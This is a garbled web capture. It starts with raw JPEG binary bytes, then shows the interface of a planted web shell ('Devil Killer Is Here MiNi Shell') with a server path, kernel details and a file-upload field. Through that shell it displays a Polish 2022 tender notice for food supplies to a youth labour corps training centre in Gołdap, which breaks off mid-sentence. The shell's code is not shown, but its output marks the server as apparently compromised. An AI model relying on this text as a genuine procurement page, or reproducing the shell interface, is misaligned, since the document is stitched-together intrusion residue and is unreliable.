JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220713/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220713/0025395101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup i sukcesywna dostawa artykułów spożywczych do Centrum Kształcenia i Wychowania Ochotniczych Hufców Pracy<br/>w Gołdapi. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">OCHOTNICZE HUFCE PRACY CENTRUM KSZTAŁCENIA I WYCHOWANIA W GOŁDAPI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 511283608</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Boczna 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gołdap</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">19-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL623 - Ełcki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(87) 615-03-53</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">(87) 615-05-07</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gospomkg4@ohp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://ckiw-goldap.ohp.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup i sukcesywna dostawa artykułów spożywczych do Centrum Kształcenia i Wychowania Ochotniczych Hufców Pracy<br/>w Gołdapi. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-886c7c5b-02c4-11ed-8000-d680d39e541a</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00253951</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-07-13</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://www.ckiw-goldap.ohp.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym aWykonawcami odbywa się drogą elektroniczną przy użyciu miniPortalu https://miniportal.uzp.gov.pl oraz ePUAPu<br/>https://epuap.gov.pl/wps/portal.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia musi posiadać konto ePUAP. Posiadając konto na ePUAP Wykonawca ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji. Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu opisane zostały w Regulaminie korzystania z miniPortalu oraz Regulaminie ePUAP. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do złożenia, zmiany, wycofania oferty oraz do komunikacji wynosi 150MB. Ofertę składa się pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej w formacie danych .pdf, .doc, .docx., .rtf, .xps, .odt opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Wszystkie informacje dotyczące RODO zawarte zostały w załączniku do SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Wszystkie informacje dotyczące RODO zawarte zostały w załączniku do SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">CKiW.271.TP.3.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">7</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1: Mięso wieprzowe, drobiowe i wołowe oraz wędliny<br/>Lp. Nazwa produktu jm. Ilość<br/>1 Boczek surowy kg 200<br/>2 Kości schabowe kg 100<br/>3 Karkówka wieprzowa b/k kg 500<br/>4 Wątróbka drobiowa kg 10<br/>5 Podgardle kg 200<br/>6 Schab wieprzowy b/k kg 500<br/>7 Szynka wieprzowa b/k kg 250<br/>8 Łopatka wieprzowa b/k kg 500<br/>9 Żeberka wieprzowe extra pasy kg 500<br/>10 Kurczak ćwiartka kg 1200<br/>11 Filet z piersi kurczaka kg 500<br/>12 Kurczak świeży kg 200<br/>13 Porcja rosołowa kg 250<br/>14 Skrzydełka kurczaka kg 200<br/>15 Podudzie kurczaka świeże kg 500<br/>16 Szynka drobiowa kg 300<br/>17 Ścinki drobiowe kg 100<br/>18 Filet z piersi indyka kg 150<br/>19 Udziec indyka kg 150<br/>20 Porcja z kaczki kg 50<br/>21 Podgardle wędzone kg 50<br/>22 Kiełbasa domowa min. 83 % mięsa kg 100<br/>23 Kiełbasa szynkowa kg 150<br/>24 Kiełbasa biała surowa kg 250<br/>25 Kiełbasa kanapkowa kg 150<br/>26 Szynka gotowa min. 83 % mięsa kg 250<br/>27 Serdelki kg 250<br/>28 Parówka cienka drobiowa min. 71 % mięsa kg 250<br/>29 Ogonówka wędzona kg 150<br/>30 Pieczeń drobiowa luks min. 83 % mięsa kg 500<br/>31 Polędwica sopocka kg 1000<br/>32 Polędwica wieprzowa wędzona min. 83 % mięsa kg 1200<br/>33 Polędwica kanapkowa kg 250<br/>34 Smalec 250 g kg 100<br/>35 Kaszanka kg 200<br/>36 Szynka wędzona min 83 % mięsa kg 200<br/>37 Szynka cygańska min 83 % mięsa kg 200<br/>38 Golonka kg 150<br/>39 Wołowina b/k kl. II kg 50<br/>40 Ligawa wołowa kg 150<br/>41 Pieczeń wieprzowa kg 150<br/>42 Jelita wieprzowe kg 50<br/>43 Pasztet wieprzowy pieczony kg 50<br/>44 Rolada faszerowana kg 150<br/>45 Kiełbasa krakowska sucha kg 100<br/>46 Kiełbasa żywiecka kg 100<br/>47 Szynka z kurcząt min 75 % mięsa kg 100 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15113000-3 - Wieprzowina</p> <p class="mb-0">15111100-0 - Wołowina</p> <p class="mb-0">15131135-0 - Wędliny drobiowe</p> <p class="mb-0">15131500-0 - Produkty drobiowe</p> <p class="mb-0">15131400-9 - Produkty wieprzowe</p> <p class="mb-0">15112000-6 - Drób</p> <p class="mb-0">15112100-7 - Świeży drób</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-23</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>• Łączna cena oferty brutto – 60,00 punktów (60 %).<br/>Przy ocenie kryterium ww. zostanie wykorzystany wzór:<br/>cena najniższa z ofert niepodlegających odrzuceniu / cena badanej oferty x 60<br/>Maksymalna ilość punktów, jaką może uzyskać oferta w kryterium „Łączna ceny oferty brutto” wynosi 60,00.<br/>• Czas konieczny na wymianę lub uzupełnienie towaru – 40,00 punktów (40 %)<br/>Zamawiający oceni deklarowany przez Wykonawcę czas na wymianę wadliwego towaru lub towaru o obniżonej jakości albo uzupełnienia braków w dostawie liczony od momentu zgłoszenia oraz czas realizacji poszczególnego zamówienia przy ewentualnym<br/>opóźnieniu w dostawie w stosunku do godzin wyszczególnionych w załączniku nr 5 do SWZ.<br/><br/>Przy ocenie ww. kryterium zostanie przyznana punktacja wg poniższego schematu:<br/>40,00 pkt – do maksymalnie 1 godziny<br/>20,00 pkt – do maksymalnie 2 godzin<br/>10,00 pkt – do maksymalnie 3 godzin<br/>0,00 pkt – do maksymalnie 4 godzin<br/>Maksymalna ilość punktów, jaką może uzyskać oferta w kryterium „Czas konieczny na wymianę lub uzupełnienie towaru” wynosi<br/>40,00. Niewskazanie czasu koniecznego na wymianę lub uzupełnienie towaru bądź wskazanie czasu dłuższego niż 4 godziny,<br/>będzie skutkowało odrzuceniem oferty. Oferty oceniane będą punktowo. Maksymalną ilość punktów, jaką może osiągnąć oferta<br/>wynosi 100,00.<br/>Sposób dokonywania oceny ofert:<br/>W trakcie oceny ofert kolejno rozpatrywanym i ocenianym ofertom przyznawane będą punkty według następującego wzoru:<br/>CN / CB x 60 + ilość pkt. związana z czasem koniecznym na wymianę lub uzupełnienie towaru<br/>gdzie:<br/>CN – cena najniższa spośród złożonych ofert<br/>CB – cena oferty badanej<br/>Punktacja przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas konieczny na wymianę lub uzupełnienie towar</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2: Warzywa i owoce<br/>Lp. Nazwa produktu jm. Ilość<br/>1 Burak ćwikłowy kg 500<br/>2 Kapusta biała kg 600<br/>3 Kapusta czerwona kg 250<br/>4 Kapusta kiszona kg 400<br/>5 Kapusta pekińska kg 350<br/>6 Sałata główka szt 500<br/>7 Sałata lodowa szt 100<br/>8 Cebula kg 500<br/>9 Nać kopru pęczek szt 100<br/>10 Nać pietruszki pęczek szt 150<br/>11 Szczypior pęczek szt 250<br/>12 Rzodkiew pęczek szt 400<br/>13 Ogórek świeży kg 400<br/>14 Marchew kg 1500<br/>15 Papryka czerwona kg 300<br/>16 Pieczarka kg 200<br/>17 Pomidor kg 500<br/>18 Pomidor koktajlowy kg 100<br/>19 Por kg 150<br/>20 Seler korzeniowy kg 250<br/>21 Pietruszka korzenna kg 300<br/>22 Rukola szt 10<br/>23 Świeże zioła szt 10<br/>24 Ziemniaki kg 40000<br/>25 Ogórek kiszony kg 250<br/>26 Brokuł szt 20<br/>27 Cebula czerwona kg 50<br/>28 Czosnek szt 200<br/>29 Kalafior szt 100<br/>30 Ogórek gruntowy kg 200<br/>31 Buraki gotowane 0,5 kg kg 200<br/>32 Pomarańcza nowalina kg 300<br/>33 Winogrono kg 200<br/>34 Kiwi kg 100<br/>35 Mandarynka kg 200<br/>36 Gruszka kg 150<br/>37 Papryka żółta kg 100<br/>38 Kapusta młoda kg 200<br/>39 Arbuz kg 100<br/>40 Banan kg 200<br/>41 Cytryna kg 200<br/>42 Jabłko kg 1000<br/>43 Nektarynka kg 100<br/>44 Sałata karbowana zielona szt 10 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">03100000-2 - Produkty rolnictwa i ogrodnictwa</p> <p class="mb-0">03212100-1 - Ziemniaki</p> <p class="mb-0">03221000-6 - Warzywa</p> <p class="mb-0">03222000-3 - Owoce i orzechy</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-23</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>• Łączna cena oferty brutto – 60,00 punktów (60 %).<br/>Przy ocenie kryterium ww. zostanie wykorzystany wzór:<br/>cena najniższa z ofert niepodlegających odrzuceniu / cena badanej oferty x 60<br/>Maksymalna ilość punktów, jaką może uzyskać oferta w kryterium „Łączna ceny oferty brutto” wynosi 60,00.<br/>• Czas konieczny na wymianę lub uzupełnienie towaru – 40,00 punktów (40 %)<br/>Zamawiający oceni deklarowany przez Wykonawcę czas na wymianę wadliwego towaru lub towaru o obniżonej jakości albo uzupełnienia braków w dostawie liczony od momentu zgłoszenia oraz czas realizacji poszczególnego zamówienia przy ewentualnym<br/>opóźnieniu w dostawie w stosunku do godzin wyszczególnionych w załączniku nr 5 do SWZ.<br/><br/>Przy ocenie ww. kryterium zostanie przyznana punktacja wg poniższego schematu:<br/>40,00 pkt – do maksymalnie 1 godziny<br/>20,00 pkt – do maksymalnie 2 godzin<br/>10,00 pkt – do maksymalnie 3 godzin<br/>0,00 pkt – do maksymalnie 4 godzin<br/>Maksymalna ilość punktów, jaką może uzyskać oferta w kryterium „Czas konieczny na wymianę lub uzupełnienie towaru” wynosi<br/>40,00. Niewskazanie czasu koniecznego na wymianę lub uzupełnienie towaru bądź wskazanie czasu dłuższego niż 4 godziny,<br/>będzie skutkowało odrzuceniem oferty. Oferty oceniane będą punktowo. Maksymalną ilość punktów, jaką może osiągnąć oferta<br/>wynosi 100,00.<br/>Sposób dokonywania oceny ofert:<br/>W trakcie oceny ofert kolejno rozpatrywanym i ocenianym ofertom przyznawane będą punkty według następującego wzoru:<br/>CN / CB x 60 + ilość pkt. związana z czasem koniecznym na wymianę lub uzupełnienie towaru<br/>gdzie:<br/>CN – cena najniższa spośród złożonych ofert<br/>CB – cena oferty badanej<br/>Punktacja przyznawana ofertom będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas konieczny na wymianę lub uzupełnienie towar</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 3: Ryby i mrożonki<br/>Lp. Nazwa produktu jm. Ilość<br/>1 Śledź matjas 4 kg kg 300<br/>2 Śledź płat marynowany 4 kg kg 100<br/>3 Filet karpia bez lodu kg 100<br/>4 Filet dorsza „SHP” kg 400<br/>5 Miruna „SHP” kg 500<br/>6 Srebrzyk tuszka- tafla I gat. kg 50<br/>7 Filet morszczuk „SHP” kg 300<br/>8 Kalafior 2,5 kg kg 600<br/>9 Bukiet warzyw 3-składniki 2,5 kg kg 700<br/>10 Mieszanka warzywna 7 składników 2,5 kg kg 700<br/>11 Marchew z groszkiem 2,5 kg kg 700<br/>12 Marchwiowe plasterki 2,5 kg kg 150<br/>13 Brokuł 2,5 kg kg 250<br/>14 Flaki mrożone suche 0,9 kg op. 100<br/>15 Włoszczyzna paski kg 250<br/>16 Mieszanka kompotowa mrożona kg 200<br/>17 Frytki z ziemniaków kg 200<br/>18 Ziemniaczane łódki kg 120<br/>19 Fasola szparagowa kg 400<br/>20 Szpinak rozdrobniony 2,5 kg kg 400<br/>21 Warzywa na patelnię 450 g szt. 100<br/>22 Kulki ziemniaczane 2,5 kg kg 100<br/>23 Marchew kostka kg 50<br/>24 Fasolka szparagowa zielona kg 200 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15000000-8 - Żywność, napoje, tytoń i produkty pokrewne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">03310000-5 - Ryby, skorupiaki i produkty wodne</p> <p class="mb-0">15200000-0 - Ryby przetworzone i konserwowane</p> <p class="mb-0">15220000-6 - Ryby mrożone, filety rybne i pozostałe mięso ryb</p> <p class="mb-0">15331170-9 - Warzywa mrożone</p> <p class="mb-0">15300000-1 - Owoce, warzywa i podobne produkty</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-23</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>• Łączna cena oferty brutto – 60,00 punktów (60 %).<br/>Przy ocenie kryterium ww. zostanie wykorzystany wzór:<br/>cena najniższa z ofert niepodlegających odrzuceniu / cena badanej oferty x 60<br/>Maksymalna ilość punktów, jaką może uzyskać oferta w kryterium „Łączna ceny oferty brutto” wynosi 60,00.<br/>• Czas konieczny na wymianę lub uzupełnienie towaru – 40,00 punktów (40 %)<br/>Zamawiający oceni deklarowany przez Wykonawcę czas na wymianę wadliwego towaru lub towaru o obniżonej jakości albo uzupełnienia braków w dostawie liczony od momentu zgłoszenia oraz czas realizacji poszczególnego zamówienia przy ewentualnym<br/>opóźnieniu w dostawie w stosunku do godzin wyszczególnionych w załączniku nr 5 do SWZ.<br/><br/>Przy ocenie ww. kryterium zostanie przyznana punktacja wg poniższego schematu:<br/>40,00 pkt – do maksymalnie 1 godziny<br/>20,00 pkt – do maksymalnie 2 godzin<br/>10,00 pkt – do maksymalnie 3 godzin<br/>0,00 pkt – do maksymalnie 4 godzin<br/>Maksymalna ilość punktów, jaką może uzyskać oferta w kryterium „Czas konieczny na wymianę lub uzupełnienie towaru” wynosi<br/>40,00. Niewskazanie czasu koniecznego na wymianę lub uzupełnienie 